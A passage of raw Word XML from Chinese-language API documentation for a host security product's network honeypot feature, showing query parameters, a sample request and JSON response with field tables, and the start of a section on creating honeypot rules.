          <w:p w14:paraId="4F965E14" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56A4150F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FC8BA96" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02AAFA0B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被攻击IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2AC0036F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66D7AF99" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B787372" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56F1C7B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14876F28" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2350921E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650245BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/detect/honeypot/linux?page=0&amp;size=50&amp;groups=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233A5062" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2A8896" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "70db8ef89e9ae79a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "172.16.159.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "internalIp": "172.16.159.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup": "未分组主机（Linux）",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "安装了mysql或者DNSmasq",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "hostname",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "time": 1528979258,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "clientIp": "172.168.1.190",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "port": 11,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "whiteRuleEffect": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC692D2"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694"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="2775"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="48665B6B"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5FB6232" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47F3052F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="511AC100" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A6B108B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1354484C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19CDF72F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D907B5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AD8E4CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DCE02F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4937D386" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2366569D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2815980F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F7734D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B3206B2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1B2EB6F0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DBA9511" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79F5A1C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F4BA7F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74772E0E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="39A6F2A8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A2CE5BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57764140" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EB219ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41998598" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6F112824" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54B7FA16" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3101FCC7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="344B2F84" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="436AB0E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2AD7CF69" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="003DDCF3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60521118" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4766B61D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A654A14" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2016D4A6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="343CC96F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B087C72" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F9AE214" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63DFE9BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1A1CE294" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26E8A7BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4677E9C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01507B9F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07A32DB3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="439640CA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="612D0FBC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18C177D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="511EB79D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2276D356" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="64C3C34B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76406836" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FEACFDD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E3508A9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2399F7CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3C70DE67" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4527F5F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29136616" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="684028AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0064F753" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>发现时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="07CFAA45" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5110F88D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>clientIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="131C0700" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3545534F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F99BC0A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>源IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="60EBBC09" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44C3DC5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28E946E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18510BF1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(8)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7843ED18" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="43D2D378" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E998B19" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>whiteRuleEffect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="737A1226" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D17345E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E40B7A9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否匹配白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0A076CDA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="169" w:name="创建单条规则"/>
      <w:bookmarkEnd w:id="168"/>
      <w:r>
        <w:t>创建单条规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E79AE5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Linux/Windows网络蜜罐设置主机规则功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252E29C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77053797" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/detect/honeypot/{linux,win}/rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E329192"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954"/>
        <w:gridCol w:w="904"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="2398"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4CB7B35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5074F4E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="547A1ED4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
